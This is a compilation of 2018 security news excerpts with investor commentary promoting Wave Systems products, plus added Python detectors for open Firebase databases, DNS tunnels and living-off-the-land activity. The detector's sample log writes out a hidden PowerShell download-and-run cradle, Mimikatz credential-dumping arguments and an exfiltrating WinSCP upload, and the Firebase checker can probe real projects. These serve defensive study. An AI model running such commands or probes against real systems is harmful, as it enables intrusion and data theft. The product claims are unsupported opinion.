At the end of a red-team assessment, Karas’s team sits down with officials from the target agency to deliver their security verdict. It might take three or four days for an agency to notice Karas’s testers had created or deleted accounts on the network, he said. “Other things might take them weeks — or they might not notice at all.”
After the initial assessment, the plan is to do another test in six months or a year’s time, he said.
Ransomhack; a new attack blackmailing business owners using GDPR
Wave has three products which can help protect against these ransomhacks: Wave VSC 2.0, Wave Endpoint Monitor, and Wave SED Management. They are a unique and excellent set of products that could help prevent a ransom fee and a GDPR fine (which can be hefty). imo. To keep these ransom hackers off the network there are also known devices (TPMs) which can keep these bad guys (unknown devices) from obtaining sensitive data from the network.
https://www.hackread.com/ransomhack-gdpr-attack-blackmailing-business-owners/
Hackers are threatening companies that they will leak stolen user data online to hurt them through GDPR regulations – in return they are demanding ransom money.
On 25 May 2018, the new European General Data Protection Regulation (GDPR) which aims to improve information security on a global scale came into force. At the same time, this provoked the emergence of a new method for blackmailing the market.
Business owners are reporting that they are being subjected to cyber attacks related to ransomware where personal data that belongs to users or customers is exposed and a ransom demand is made in return for its retrieval.
Experts from Bulgaria based TAD GROUP point out the difference in the ransom methodology. This time cybercriminals aim to disclose private information to the public eye rather than encrypt it so it is unobtainable unless paid for.
Hackers threaten to publish the entire content of the database, containing personal data records, on a public server, which, according to the regulation, means that the company will be severely fined.
This is the warning that Ivan Todorov, the founder of TAD GROUP, is issuing. According to him, the victims are medium and large-scale Bulgarian companies which are requested to pay a ransom in an untraceable cryptocurrency.
The ransoms vary from $1,000 to $20,000, while the fines for companies that the new EU regulation envisions account for 4% of the global annual turnover for the previous year or up to 20 million euros. In short, Ivan Todorov calls this type of hacker attack “ransomhack“.
According to TAD GROUP, from credible sources, it has become clear that the attacked companies have taken GDPR protection measures by creating policies for personal data storage and security in their offices but have not conducted information security tests to verify whether they are actually susceptible to virtual attacks from cybercriminals.
In other words, they did what is necessary to achieve compliance with the requirements of the Commission for Personal Data Protection. However, most companies did not consider securing their Internet-facing infrastructure.
The opinion of companies offering cybersecurity solutions (such as TAD GROUP) is that the only way to ensure a higher grade of security against cyber attacks is to undertake tests for information security – otherwise known as penetration tests.
The tests are a simulation of targeted cyber attacks, except that they are not done with criminal intentions but deliberately with the exclusive permission from clients and in accordance with their specific needs. The goal is to use methods and techniques utilized by malicious third-parties in order to detect and patch security vulnerabilities. This is done with a signed contract and confidentiality agreement.
After performing the service, the results are documented in a penetration test report that is stored in the client’s profile where it can be viewed and downloaded. It can also be deleted from TAD GROUP’s system if requested by the client.
“The cybersecurity as a whole is ever changing – if a system is not prone to successful attacks today, this does not necessarily mean that it will not be vulnerable in a month’s time. New vulnerabilities and exploits that lead to information leaks are emerging every day. This is why the more often these tests are performed, the more secure companies can feel”, explains Ivan Todorov and recommends that penetration tests are undertaken at least twice a year.
As the disruption in cybersecurity is often a consequence of human error, companies would benefit from the so-called social engineering tests. They are a set of tests carried out against employees operating from within the company’s headquarters and offices – usually via phone or e-mail, without the employees’ knowledge. A wide variety of techniques are applied in order to force employees to disclose sensitive or confidential business information to affiliates who should not have access to it otherwise.
Companies that have already become a victim of a cybercrime have the obligation to inform the regulatory authority within 72 hours of confirming the data breach. For Bulgaria, the regulatory authority is the Commission for Personal Data Protection, which has to assess what sanctions to impose after a data breach occurs. However, if a company does not inform the regulator in time, sanctions will surely be imposed and their severity will differ for the worse.
Note: These are the findings of TAD GROUP, to contact the company for more information on the issue visit their official website.
Software Attacks on Hardware Wallets
If EXO5 is still owned by Wave, it could have positive implications for Wave given that the typical phone can be hacked when a hacker is in possession of the phone as summarized in the Black Hat presentation. EXO5 could possibly kill the phone before the hacker has a chance to hack it or find it. Could a hacker have a more difficult time with the Boeing phone which has a TPM? Could there be a Samsung TPM in a phone in the future? Samsung/Wave agreement was a 15 year agreement.
https://www.blackhat.com/us-18/briefings/schedule/index.html#software-attacks-on-hardware-wallets-10665
Almost all security research has a question often left unanswered: what would be the financial consequence, if a discovered vulnerability is maliciously exploited? The security community almost never knows, unless a real attack takes place and the damage becomes known to the public. Development of the cryptocurrencies made it even more difficult to control the impact of an attack since all the security relies on a single wallet's private key which needs to stay secure. Multiple breaches of private wallets and public currency exchange services are well-known, and to address the issue a few companies have come up with secure hardware storage devices to preserve the wallet's secrets at all costs.
But how secure are they? In this research, we show how software attacks can be used to break into the most protected part of the hardware wallet, the Secure Element, and how it can be exploited by an attacker. The number of identified vulnerabilities in the hardware wallet shows how software vulnerabilities in the TEE operating system can lead to a compromise of the memory isolation and the revealing of secrets of the OS and other user applications. Finally, based on the identified vulnerabilities, an attack is proposed which allows anyone with only physical access to the hardware wallet to retrieve secret keys and data from the device. Additionally, a supply chain attack on the device is described that allows an attacker to bypass security features of the device and have full control of the installed wallets on the device.
3,000+ mobile apps leaking data from unsecured Firebase databases
Another reason companies and governments should be happy to use Wave VSC 2.0.
https://www.helpnetsecurity.com/2018/06/20/unsecured-firebase-databases/
Appthority published research on its discovery of a new HospitalGown threat variant that occurs when app developers fail to require authentication to Google Firebase databases.
Appthority security researchers discovered the HospitalGown vulnerability in 2017 which leads to data exposures, not due to any code in the app, but to the app developers’ failure to properly secure backend data stores (hence the name). The new Firebase variant exposes large amounts of mobile app-related data stored in unsecured Firebase databases.
Exposed data includes personally identifiable information (PII), private health information (PHI), plaintext passwords, social media account and cryptocurrency exchange private access tokens, financial transactions, vehicle license plate and registration numbers, and more data leaking from vulnerable apps.
“The Firebase vulnerability is a significant and critical mobile vulnerability exposing vast amounts of sensitive data,” said Seth Hardy, Appthority Director of Security Research. “The large number of vulnerable apps and the wide variety of data shows that enterprises can’t rely on mobile app developers, app store vetting or simple malware scans to address data security. To keep their data safe and stay in compliance with regulations like GDPR, HIPAA and PCI, they need to be investing in deep app analysis that detects these types of vulnerabilities.”
Key findings
• 3,000 mobile iOS and Android apps (over 620 million Android downloads alone) are leaking data from 2,300 unsecured Firebase databases
• Multiple app categories are impacted including tools, productivity, health and fitness, communication, cryptocurrency, finance and business apps
• Most enterprises are impacted: 62% of enterprises have at least one vulnerable app in their mobile environment.
More than 100 million records are exposed, including:
• 2.6 million plain text passwords and user IDs
• 4 million+ PHI (Protected Health Information) records (chat messages and prescription details)
• 25 million GPS location records
• 50,000 financial records including banking, payment and Bitcoin transactions
• 4.5 million+ Facebook, LinkedIn, Firebase, and corporate data store user tokens.
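The check behind this class of exposure, added here as an example and not Appthority's scanner or anything from the article: a Firebase Realtime Database whose rules grant ".read" to everyone returns its whole tree to a plain unauthenticated GET of https://<project>.firebaseio.com/.json, while a project whose rules require auth answers HTTP 401 with "Permission denied". The host names, HTTP responses and the users/$uid rules layout below are constructed for the demo; the fetch function is injected so it runs offline, and the live fetcher is for projects you are authorised to test.

```python
"""Unauthenticated-read check for a Firebase Realtime Database, plus a rules lint.

Added example, not Appthority's scanner. A Firebase project whose rules grant
".read" to everyone returns its entire tree to a plain GET of
https://<project>.firebaseio.com/.json; a project whose rules require auth
returns HTTP 401 with {"error" : "Permission denied"}. The fetch function is
injected so the demo runs offline against constructed responses; pass
live_fetch for an authorised test of a real project.
"""
import json
from typing import Callable, Dict, List, Tuple

Fetcher = Callable[[str], Tuple[int, str]]

def firebase_root_url(host: str) -> str:
    """REST read of the database root; host is the app's firebaseio.com name."""
    return f"https://{host}/.json"

def classify(status: int, body: str) -> str:
    """Map the REST response to a verdict."""
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "unexpected"
        return "open-empty" if data is None else "open"
    if status == 401 and "Permission denied" in body:
        return "protected"
    if status == 404:
        return "not-found"
    return "unexpected"

def check_host(host: str, fetch: Fetcher) -> Dict[str, object]:
    url = firebase_root_url(host)
    status, body = fetch(url)
    verdict = classify(status, body)
    keys: List[str] = []
    if verdict == "open":
        data = json.loads(body)
        if isinstance(data, dict):
            keys = sorted(data)       # top-level collections, e.g. "users"
    return {"host": host, "url": url, "verdict": verdict, "top_level_keys": keys}

# Rules as deployed in the Firebase console. The weak form is what the exposed
# apps effectively ran; the hardened form (assumed users/$uid schema) limits
# each user to their own subtree and denies everything else by default.
WEAK_RULES = {"rules": {".read": True, ".write": True}}
HARDENED_RULES = {"rules": {"users": {"$uid": {
    ".read": "auth != null && auth.uid == $uid",
    ".write": "auth != null && auth.uid == $uid"}}}}

def rules_world_accessible(rules: dict) -> bool:
    """True if any node grants .read or .write unconditionally (literal true).

    Read/write grants cascade downward in Firebase, so one literal true at a
    node opens its whole subtree regardless of stricter rules below it."""
    def walk(node) -> bool:
        if not isinstance(node, dict):
            return False
        if node.get(".read") is True or node.get(".write") is True:
            return True
        return any(walk(v) for k, v in node.items() if not k.startswith("."))
    return walk(rules.get("rules", {}))

# Constructed responses standing in for the network (hosts are fictitious).
FAKE_RESPONSES = {
    "https://open-demo-app.firebaseio.com/.json": (200, json.dumps(
        {"users": {"u1": {"email": "a@example.com", "password": "hunter2"}}, "chats": {}})),
    "https://locked-demo-app.firebaseio.com/.json": (401, '{"error" : "Permission denied"}'),
    "https://gone-demo-app.firebaseio.com/.json": (404, ""),
}

def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_RESPONSES.get(url, (500, ""))

def live_fetch(url: str) -> Tuple[int, str]:
    """Real fetcher (stdlib only); use solely against projects you are allowed to test."""
    import urllib.error, urllib.request
    req = urllib.request.Request(url, headers={"User-Agent": "firebase-rules-check"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")

if __name__ == "__main__":
    for host in ("open-demo-app", "locked-demo-app", "gone-demo-app"):
        print(check_host(f"{host}.firebaseio.com", fake_fetch))
    print("weak rules world-accessible:", rules_world_accessible(WEAK_RULES))
    print("hardened rules world-accessible:", rules_world_accessible(HARDENED_RULES))
```

The hostname to test is normally lifted from the app's bundled google-services.json or GoogleService-Info.plist, or from its traffic; the rules lint is the thing to run before shipping, since the "open" verdict only tells you the root is readable, and a project can be exposed one subtree down even when the root is not.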
Over half of Americans would stop using an app if their messages could be read by others
It appears that the market could be ready for Wave's Scrambls!
https://www.zdnet.com/article/over-half-of-americans-would-stop-using-an-app-if-their-messages-could-be-read-by-others/
Social media platforms must evolve to higher privacy standards -- to stop their users leaving for more secure channels.
Our social sharing behaviour drives us to tend to trust that whatever we say on social media is for our own eyes. But the furor over Cambridge Analytica's access to our data has shown consumers are not happy at all that our data is being used for gain.
Platforms such as Twitter and Facebook are not only watching what we post, but Facebook is also listening to our verbal conversations to deliver more targeted ads to us.
Our attitudes are changing. Social consumers now demand better security across their social media sites -- and they're forcing the social platforms to listen to them.
The social media giants are listening. Twitter is testing an encrypted messaging feature, Yahoo is testing an invite-only group messaging app called Squirrel, and Facebook has introduced its 'Clear History' privacy control to reassure users that their data is secure and private.
Secure messaging app platform Viber has released an online survey showing what US consumers think about their personal information being shared online.
It polled a representative sample of 1,500 US online consumers in March 2018 and asked them about privacy, security, and data sharing.
Consumers do not check their privacy settings, but expect their messages to be secure.
Almost a third of respondents (32.5 percent) only check their privacy settings once every six months, yet 63.2 percent of men and 67.1 percent of women expect that the person they are messaging is the only one allowed to see that message.
If social posts or chat messages were shared publicly, 38.9 percent of male respondents (45.6 percent female) said they were concerned about identity theft.
Another 4.4 percent were worried that they could lose their jobs (3.8 percent female), and 3.3 percent thought that their significant other might leave them (1.6 percent female).
Customers have no tolerance for data shared with advertisers or political managers. Over half of consumers (55 percent) would stop using a messaging app, and one in three (33.3 percent) would be most upset if their contact details were shared.
Consumers want strong end-to-end encryption across their chosen platforms. Currently, the efforts made by Twitter and Facebook do not quite reach the huge expectations of users. Consumers want secure social apps with encryption that advertisers cannot access.
Future social apps must be developed with encryption in mind -- encrypted channels reassure users that they can have more open conversations with their connections.
With the app upgrades coming from platforms like Facebook and Twitter, will it be enough to reassure consumers that their data really is secure?
'Hidden Tunnels' Help Hackers Launch Financial Services Attacks
If Financial Services companies knew about the greatness lurking in Wave VSC 2.0 and other Wave products the problems in these articles wouldn't be occurring as they are. Known devices could go a long way in keeping the bad guys off the network. Unknown devices could be kicked off the network and keep the attackers from tunneling. imo.
https://www.darkreading.com/hidden-tunnels-help-hackers-launch-financial-services-attacks/d/d-id/1332109
Hackers are using the infrastructure, meant to transmit data between applications, for command and control.
The security tools and strategies financial services organizations use to protect their data could be leveraged by cybercriminals who sneak in undetected via "hidden tunnels" to conceal their theft, according to a new report published by Vectra.
Ironically, financial firms have the biggest non-government security budgets in the world, Vectra says. Bank of America invests more than $600 million in cybersecurity each year, while JPMorgan Chase spends $500 million. Equifax, while smaller than both, spends an annual $85 million on security.
Yet, in Equifax's case – despite budget, staff, and a security operations center – in 2017 it took 78 days for it to detect a massive breach of its network, in which attackers accessed 145.5 million Social Security numbers, 17.6 million driver's license numbers, 20.3 million phone numbers, and 1.8 million email addresses.
The question of how attackers were able to exfiltrate so much data, and whether the same thing could happen at another financial firm, prompted Vectra researchers to take a closer look at exactly what happened.
A Review of the Equifacts
Equifax's breach started when a Web server was exploited to access the corporate network. The attackers avoided using tools that would alert the company's security team, instead building command-and-control (C&C) tunnels into Equifax. They installed more than 30 Web shells with different addresses to burrow into Equifax and, once inside the network, customized their hacking tools to exploit Equifax software, evade firewalls, and exfiltrate information.
For six months following the Equifax breach, Vectra researchers combed metadata from 246 opt-in customers and more than 4.5 million devices to learn more about attacker behaviors and network trends. They found the same activity that led to the Equifax breach is prevalent throughout the financial services industry.
What stood out most is the use of hidden tunnels in HTTP, HTTPS, and DNS traffic, which threat actors use to get into networks protected with strong access controls. These tunnels have been used for about three to four years, says Chris Morales, head of security analytics at Vectra, where researchers had been looking into this tactic long before Equifax was hit.
"Attackers don't use hidden tunnels unless they have to," he explains. When enterprise security defenses are strong, threat actors have to seek new ways to break through them.
Tunneling Into Financial Services
Financial firms have stronger security than most, securing Web applications with layers upon layers of access controls. Because apps are locked down, data has to be sent through "hidden tunnels" to move across an organization. There are legitimate use cases for this: specific commercial stock-ticker apps and internal financial services use tunnels to communicate.
The high volume of traffic flowing to and from enterprise Web applications creates an ideal place for attackers to hide, Morales says. Hidden tunnels are tough to detect because communications are hidden within connections that use normal, permitted protocols. Messages can be embedded as text in headers, cookies, and other fields, researchers say.
Morales breaks down how an attack might work: A threat actor might start with an entry point as simple as a phishing campaign. With a foothold in the organization, the attacker can use reconnaissance techniques to learn the network – the number of devices and how he can make his footprint more durable and infect more machines.
"As he does all those things, he'll need to find ways to look like normal traffic," Morales explains. "Maybe he'll find a network scanning machine and perform recon from there because it'll look more normal." Once a tunnel is established, the hacker passes data in small chunks so it isn't picked up by anomaly detection systems.
Attackers could leverage tools purchased on the Dark Web to exfiltrate data and bypass access controls. "The tools are out there, and attackers have a great ecosystem for sharing them," says Mike Banic, vice president of marketing at Vectra. "In some cases, their ecosystem could be better than the defenders."
Compared with the industry average, there are fewer C&C behaviors in financial services, and HTTP C&C communications are lower overall, the report states. However, there are significantly more tunnels per 10,000 devices in financial services than all other industries combined.
=========================================================
Attackers Spy and Steal from Financial Firms
https://www.infosecurity-magazine.com/news/attackers-spy-and-steal-from/?utm_source=dlvr.it&utm_medium=twitter
In an attempt to steal sensitive data, cyber-criminals have been targeting financial firms by building hidden tunnels in order to break into networks. According to a report released today by Vectra, these attack behaviors are the same as those that led to the 2017 Equifax breach.
According to a new report, 2018 Spotlight Report on Financial Services, attackers are able to gain remote access through the use of command-and-control (C&C). In the data analyzed, attackers had established nearly 30 web shells accessible from approximately 35 different public IP addresses, which allowed them to exfiltrate data while going undetected.
Attackers often leverage hidden tunnels to infiltrate networks with strong access controls because legitimate applications also use hidden tunnels to bypass security controls that can sometimes compromise full functionality. That's why it's a successful attack method.
"Every industry has a profile of network and user behaviors that relate to specific business models, applications and users," said Chris Morales, head of security analytics at Vectra. "Attackers will mimic and blend in with these behaviors, making them difficult to expose."
In this latest discovery, Vectra detected more hidden C&C tunnels and more than twice as many hidden data-exfiltration tunnels per 10,000 devices in financial services than all other industries combined.
To evade firewalls, attackers use special tunneling tools to move laterally, stockpiling data from database after database as they go. They were able to amass so much data that it then needed to be divided into smaller stockpiles so that no alarm bells went off during exfiltration.
"All this points to one painful fact: The largest enterprise organizations in the world remain lucrative targets for sophisticated cyber-attackers. Security breaches across multiple industries forge ahead in an upward trajectory, and the financial services industry is no exception," the report said.
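Both articles above describe the same tactic: C&C and exfiltration hidden inside permitted protocols, with the data cut into small chunks so no single message trips a volume alarm. The detector below is an added example of how a practitioner would hunt the DNS variant in a resolver query log; it is not Vectra's detection logic. It keys on what chunking cannot hide: one base domain receiving many queries, nearly every name unique, long high-entropy subdomain parts, and TXT/NULL record types. The log format, client addresses and domains (example-bank.com, exfil-demo.net) are constructed for the demo.

```python
"""Find DNS names that behave like covert tunnels in a resolver query log.

Added example; not Vectra's detection logic. A tunnel that pushes data out in
small chunks keeps each query unremarkable, but the stream as a whole is not:
one base domain receives many queries, almost every name is unique, the
subdomain part is long and high-entropy, and TXT/NULL records dominate. The
log format, hosts and domains below are constructed; real input would be a
resolver log, Zeek dns.log or Windows DNS analytic events.
"""
import hashlib
import math
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

def shannon_entropy(s: str) -> float:
    """Bits per character: 0 for 'www', ~2.3 for 'login', ~3.8 for 48 hex chars."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_name(qname: str) -> Tuple[str, str]:
    """(base domain, subdomain). Assumes a two-label registrable domain;
    a production version would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Log record: '<epoch> <client> <qname> <qtype>' (constructed format)."""
    parts = line.split()
    if len(parts) != 4:
        return None
    return {"ts": parts[0], "client": parts[1], "qname": parts[2], "qtype": parts[3].upper()}

def profile(lines: List[str]) -> Dict[str, dict]:
    """Aggregate per base domain the features a chunked tunnel cannot suppress."""
    stats: Dict[str, dict] = defaultdict(lambda: {
        "queries": 0, "names": set(), "clients": set(),
        "sub_chars": 0, "entropy_sum": 0.0, "txt_null": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base, sub = split_name(rec["qname"])
        payload = sub.replace(".", "")        # the part an encoder controls
        s = stats[base]
        s["queries"] += 1
        s["names"].add(rec["qname"])
        s["clients"].add(rec["client"])
        s["sub_chars"] += len(payload)
        s["entropy_sum"] += shannon_entropy(payload)
        s["txt_null"] += int(rec["qtype"] in ("TXT", "NULL"))
    return stats

def find_tunnels(lines: List[str], min_queries: int = 20, min_unique_ratio: float = 0.8,
                 min_avg_len: int = 20, min_entropy: float = 3.0) -> List[dict]:
    """Flag the conjunction of churn, length and entropy per base domain.
    Any one feature alone (e.g. many unique names) also fits CDNs and hash-based
    reputation lookups, hence the conjunction plus an allowlist in practice."""
    findings = []
    for base, s in profile(lines).items():
        q = s["queries"]
        if q < min_queries:
            continue
        unique_ratio = len(s["names"]) / q
        avg_len = s["sub_chars"] / q
        avg_entropy = s["entropy_sum"] / q
        if unique_ratio >= min_unique_ratio and avg_len >= min_avg_len and avg_entropy >= min_entropy:
            findings.append({
                "domain": base, "queries": q, "clients": sorted(s["clients"]),
                "unique_ratio": round(unique_ratio, 2), "avg_sub_len": round(avg_len, 1),
                "avg_entropy": round(avg_entropy, 2),
                "txt_null_fraction": round(s["txt_null"] / q, 2),
                "encoded_chars": s["sub_chars"]})   # upper bound on bytes carried out
    return findings

def build_sample_log() -> List[str]:
    """Constructed: 40 ordinary lookups from three clients, then 40 queries from
    one client, each carrying a fresh 24-byte hex chunk spread over three labels."""
    ordinary = ["www.example-bank.com A", "cdn.example-bank.com A",
                "mail.example-bank.com MX", "login.example-bank.com A"]
    lines = [f"{1528900000 + i} 10.0.1.{15 + i % 3} {ordinary[i % 4]}" for i in range(40)]
    for i in range(40):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]  # stands in for ciphertext
        qname = f"{chunk[:16]}.{chunk[16:32]}.{chunk[32:]}.exfil-demo.net"
        lines.append(f"{1528900100 + i} 10.0.1.40 {qname} TXT")
    return lines

if __name__ == "__main__":
    for finding in find_tunnels(build_sample_log()):
        print(finding)
```

The same per-destination features (unique-value ratio, length, entropy of the encoder-controlled field) carry over to the HTTP variant the report describes, with the cookie or custom-header value taking the place of the subdomain; the thresholds above are starting points to tune against a baseline of your own resolver's traffic, not fixed constants.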
Chinese Hackers Target Satellite, Geospatial Imaging, Defense Companies
Wave could have eliminated these attacks with known devices (or the use of TPMs throughout the defense companies' fleet) and Wave Endpoint Monitor could have helped stop the APT. imo. The attackers would have had a difficult time blending in with the network being an unknown device. Wave's products would have fared much better than whoever was responsible for stopping the hacks in the first place. imo. Wave Endpoint Monitor could do a better job overall of detecting custom made malware than a blacklisting anti virus product like Symantec. imo.
https://www.bleepingcomputer.com/news/security/chinese-hackers-target-satellite-geospatial-imaging-defense-companies/
A cyber-espionage group believed to be operating out of China hacked companies that develop satellite communications and geospatial imaging systems, as well as defense contractors, in both the United States and Southeast Asia.
The hacks were detected by US cyber-security firm Symantec, who said today in a report that intruders showed particular interest in the operational side of the breached companies.
Hackers paid close attention to reaching and infecting computer systems used for controlling communications satellites or those working with geospatial data collected by world-mapping satellites.
"This suggests to us that [the group]’s motives go beyond spying and may also include disruption," Symantec said. There are fears that hackers might be able or even attempt to sabotage satellites or poison geospatial data.
Thrip APT behind the hacks
The company said that an advanced persistent threat (APT, a term used to describe cyber-espionage groups) known under the codename Thrip was responsible for the attacks.
Symantec says it's been tracking this group since 2013, and it has historically believed the group to be operating out of China.
The recent attacks were difficult to detect, the company said. Hackers used a technique known as "living off the land," which consists of using local tools already available on the operating system to carry out malicious operations.
"The purpose of living off the land is twofold," Symantec explained. "By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes. Secondly, even if malicious activity involving these tools is detected, it can make it harder to attribute attacks."
According to Symantec, hackers used the following locally-installed and completely legitimate tools...
PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
WinSCP: Open source FTP client used to exfiltrate data from targeted organizations.
LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorized access to the victim’s LogMeIn accounts or whether they created their own.
...to install custom-made malware such as:
Trojan.Rikamanu: A custom Trojan designed to steal information from an infected computer, including credentials and system information.
Infostealer.Catchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications (such as new or updated web browsers) that have emerged since the original Trojan.Rikamanu malware was created.
Trojan.Mycicil: A keylogger known to be created by underground Chinese hackers. Although publicly available, it is not frequently seen.
Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by Thrip in other campaigns.
Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.
Hacks detected as far back as January 2018
Symantec says it detected these attacks only after one of its artificial intelligence and machine learning-based tools triggered an alert for a suspicious use of a legitimate tool.
Experts say they used this initial alert to uncover initial signs of compromise and then pulled on a thread to uncover a broader operation targeting multiple companies across multiple countries and industry sectors. The purpose of this hacking campaign was obviously cyber-espionage.
The company says it uncovered this operation in January, but the Thrip hacking campaign could be broader than the company has currently reported.
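The whole point of living off the land is that PsExec, PowerShell, WinSCP and LogMeIn are legitimate, so a detection has to key on how they are used rather than on the binary. The script below is an added example of that approach over process-creation records; it is not Symantec's detection logic. It flags PsExec spawning a shell on another host (and the PSEXESVC child on the target), PowerShell pulling a payload from the network, including when the script is hidden inside an -EncodedCommand blob, Mimikatz-style module arguments regardless of the binary's name, WinSCP driven by a script, and a remote-access tool on a host where it is not sanctioned. The log format, host names, users, addresses and the LogMeIn allowlist are constructed for the demo; a real feed would be Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled.

```python
"""Flag living-off-the-land activity in process-creation logs.

Added example, not Symantec's detection logic. Records are 'ts|host|user|
parent image|image|command line' (constructed format). Host names, users,
addresses and the LogMeIn allowlist are all fictitious.
"""
import base64
import ntpath
import re
from typing import Dict, List

LOGMEIN_ALLOWED_HOSTS = {"HELPDESK-01"}      # assumed: hosts where LogMeIn is sanctioned

PS_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer|"
    r"\biex\b|invoke-expression|frombase64string|-w(?:indowstyle)?\s+hidden", re.I)
MIMIKATZ = re.compile(r"sekurlsa::|lsadump::|privilege::debug|kerberos::|mimikatz", re.I)
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def basename(path: str) -> str:
    return ntpath.basename(path).lower()

def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def parse_line(line: str) -> Dict[str, str]:
    ts, host, user, parent, image, cmdline = line.split("|", 5)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "image": image, "cmdline": cmdline}

def evaluate(rec: Dict[str, str]) -> List[Dict[str, str]]:
    """Apply every behaviour rule to one record; a record may hit several."""
    img, parent, cmd = basename(rec["image"]), basename(rec["parent"]), rec["cmdline"]
    hits: List[Dict[str, str]] = []

    def hit(rule: str, evidence: str) -> None:
        hits.append({"rule": rule, "host": rec["host"], "user": rec["user"], "image": img, "evidence": evidence})

    if img in {"psexec.exe", "psexec64.exe", "paexec.exe"} and "\\\\" in cmd:
        hit("psexec-lateral-movement", cmd)           # \\target on the command line
    if parent == "psexesvc.exe":
        hit("psexec-remote-execution", f"child of PSEXESVC: {cmd}")   # seen on the target
    if img in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        m = PS_CRADLE.search(cmd + " " + decoded)
        if m:
            hit("powershell-download-cradle", decoded or m.group(0))
    if img == "mimikatz.exe" or MIMIKATZ.search(cmd):
        hit("credential-dumping-args", cmd)           # catches renamed binaries too
    if img in {"winscp.exe", "winscp.com"} and re.search(r"/script|/command", cmd, re.I):
        hit("winscp-scripted-transfer", cmd)
    if img.startswith(("logmein", "lmi")) and rec["host"] not in LOGMEIN_ALLOWED_HOSTS:
        hit("unsanctioned-remote-access-tool", img)
    return hits

def scan(lines: List[str]) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for line in lines:
        if line.strip():
            findings.extend(evaluate(parse_line(line)))
    return findings

def build_sample_log() -> List[str]:
    """Constructed Sysmon-like records: benign activity, then the chain of tools."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return [
        "2018-01-09T08:01:10|WS-017|CORP\\jdoe|explorer.exe|C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE|OUTLOOK.EXE",
        "2018-01-09T08:02:11|WS-017|CORP\\jdoe|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-Process",
        f"2018-01-09T08:05:42|WS-017|CORP\\jdoe|WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoProfile -w hidden -EncodedCommand {enc}",
        "2018-01-09T09:14:03|WS-017|CORP\\jdoe|cmd.exe|C:\\Users\\jdoe\\AppData\\Local\\Temp\\svc.exe|svc.exe privilege::debug sekurlsa::logonpasswords exit",
        "2018-01-09T09:20:55|WS-017|CORP\\jdoe|cmd.exe|C:\\Tools\\PsExec.exe|PsExec.exe \\\\GEO-SRV-02 -u CORP\\svc_backup -p ******** cmd.exe",
        "2018-01-09T09:20:57|GEO-SRV-02|CORP\\svc_backup|PSEXESVC.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe",
        "2018-01-09T11:30:00|GEO-SRV-02|CORP\\svc_backup|cmd.exe|C:\\Program Files (x86)\\WinSCP\\WinSCP.com|WinSCP.com /command \"open sftp://u@198.51.100.7/\" \"put C:\\Data\\imagery.zip\" exit",
        "2018-01-09T12:00:00|GEO-SRV-02|CORP\\svc_backup|services.exe|C:\\Program Files\\LogMeIn\\x64\\LogMeIn.exe|LogMeIn.exe",
        "2018-01-09T12:01:00|HELPDESK-01|CORP\\helpdesk|services.exe|C:\\Program Files\\LogMeIn\\x64\\LogMeIn.exe|LogMeIn.exe",
    ]

if __name__ == "__main__":
    for finding in scan(build_sample_log()):
        print(finding["host"], finding["rule"], "->", finding["evidence"][:80])
```

None of these rules needs a signature for the custom Trojans Symantec lists; they fire on the tradecraft around them, which is what the "suspicious use of a legitimate tool" alert that started Symantec's investigation amounts to. The command-line fields only exist if 4688 command-line auditing or Sysmon is deployed, so that telemetry is the prerequisite for any of this.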